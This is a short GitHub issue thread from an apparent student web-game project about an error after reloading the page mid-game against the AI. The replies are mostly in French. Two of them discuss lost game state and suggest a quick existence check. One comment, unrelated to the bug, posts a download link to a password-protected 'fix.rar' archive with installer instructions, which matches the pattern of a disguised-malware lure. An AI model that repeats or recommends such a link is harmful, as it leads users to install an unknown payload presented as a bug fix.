### ISSUE TITLE
Reload in during game

### ISSUE THREAD

**Issue by isabel42** [42-Student-Teams/ft_transcendence#7]
Si on fait Crtl+R pendant le jeu contre AI, erreur suivant 
![image](https://github.com/user-attachments/assets/a2bd6730-808b-4b5b-865b-2a1e17d17d20)

**Comment by dirk-seynhaeve** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jwikiera** [comment]
Si on fait ctrl + r il faut qu'on revienne dans Home de toute façon. L'objet avec les données du jeu est populé dans home et passé à la vue localGame.js. Si on refresh, on perd la data, vu qu'on est pas censé refresh de toute manière.

**Comment by SabaLeonel** [comment]
Même si on est pas censé refresh ce genre d'erreur on peut fix rapidement il suffit d'ajouter une condition pour voir s'il existe
